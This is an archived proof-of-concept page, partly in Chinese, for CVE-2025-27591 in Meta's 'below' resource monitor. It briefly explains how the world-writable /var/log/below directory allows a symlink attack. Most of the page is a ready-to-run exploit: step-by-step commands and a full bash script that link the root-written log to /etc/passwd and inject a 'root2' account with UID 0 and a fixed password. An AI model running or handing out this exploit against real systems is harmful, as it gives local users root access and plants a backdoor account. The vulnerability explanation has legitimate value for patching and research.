关联漏洞
标题:
below 安全漏洞
(CVE-2025-27591)
描述:below是Meta Incubator开源的一个现代 Linux 系统的资源监视器。 below v0.9.0之前版本存在安全漏洞,该漏洞源于创建了全局可写目录,可能导致通过符号链接攻击提升到root权限。
描述
Local Privilege Escalation vai `below` (CVE-2025-27591) - PoC Exploit
介绍
# CVE-2025-27591 – Privilege Escalation in Below
## 1) Introduction
[Below](https://github.com/facebookincubator/below) is a Linux tool for recording and displaying system data such as hardware utilization and cgroup metrics.
In versions prior to **v0.9.0**, Below’s systemd service runs with `root` privileges and creates world-writable log directories and files under `/var/log/below`. This insecure configuration enables **symlink attacks** that allow an unprivileged local user to escalate privileges to `root`.
This issue was assigned **CVE-2025-27591**.
Upstream fixed it in **v0.9.0**.
---
## 2) Vulnerability – Symlink Attack in `/var/log/below`
- Below ensures `/var/log/below` has **0777** permissions at runtime.
- It also creates `/var/log/below/error_root.log` with **0666** permissions.
- Because the directory is world-writable, an attacker can **replace the log file with a symlink** to any sensitive file (e.g., `/etc/passwd`).
- When Below writes logs as root, it will instead write to the symlink target, allowing privilege escalation.
This behavior bypasses the kernel’s `protected_symlinks` hardening because the sticky bit is not applied.
---
## 3) Exploitation
By pointing `error_root.log` to `/etc/passwd`, we can inject a new root user with a known password.
### Steps
Step 1: Create backup of `/etc/passwd`.
Always back up before modifying system files:
```bash
cp /etc/passwd /tmp/passwd.bak
```
Step 2: Generate a malicious user entry
```bash
HASH=$(openssl passwd -6 'rooted123')
echo "root2:$HASH:0:0:root:/root:/bin/bash" > /tmp/payload
```
Step 3: Symlink the vulnerable log
```bash
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
```
Step 4: Trigger log creation
```bash
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1
```
Step 5: Overwrite `/etc/passwd`
```bash
cat /tmp/payload > /var/log/below/error_root.log
```
Step 6: Switch to the new root user
```bash
su root2
# password: rooted123
```
---
## 4) Proof of Concept (PoC): Run this script
```bash
#!/bin/bash
# CVE-2025-27591 Exploit - Privilege Escalation via 'below'
TARGET="/etc/passwd"
LINK_PATH="/var/log/below/error_root.log"
TMP_PAYLOAD="/tmp/payload"
BACKUP="/tmp/passwd.bak"
echo "[*] CVE-2025-27591 Privilege Escalation Exploit"
# Check for sudo access to below
echo "[*] Checking sudo permissions..."
if ! sudo -l | grep -q '/usr/bin/below'; then
echo "[!] 'below' is not available via sudo. Exiting."
exit 1
fi
# Backup current /etc/passwd
echo "[*] Backing up /etc/passwd to $BACKUP"
cp /etc/passwd "$BACKUP"
# Generate password hash for 'root2' user (password: rooted123)
echo "[*] Generating password hash..."
HASH=$(openssl passwd -6 'rooted123')
# Prepare malicious passwd line
echo "[*] Creating malicious passwd line..."
echo "root2:$HASH:0:0:root:/root:/bin/bash" > "$TMP_PAYLOAD"
# Create symlink
echo "[*] Linking $LINK_PATH to $TARGET"
rm -f "$LINK_PATH"
ln -sf "$TARGET" "$LINK_PATH"
# Trigger log creation with invalid --time to force below to recreate the log
echo "[*] Triggering 'below' to write to symlinked log..."
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1
# Overwrite passwd file via symlink
echo "[*] Injecting malicious user into /etc/passwd"
cat "$TMP_PAYLOAD" > "$LINK_PATH"
# Test access
echo "[*] Try switching to 'root2' using password: rooted123"
su root2
```
<img width="293" height="136" alt="CVE-2025-27591" src="https://github.com/user-attachments/assets/b01a5ea4-1b0e-4986-81c5-dabe06e4e148" />
文件快照
[4.0K] /data/pocs/0c5cfae4320ffa514b9ed20cec0818ffbb2692e1
├── [1.3K] CVE-2025-27591.sh
└── [3.5K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。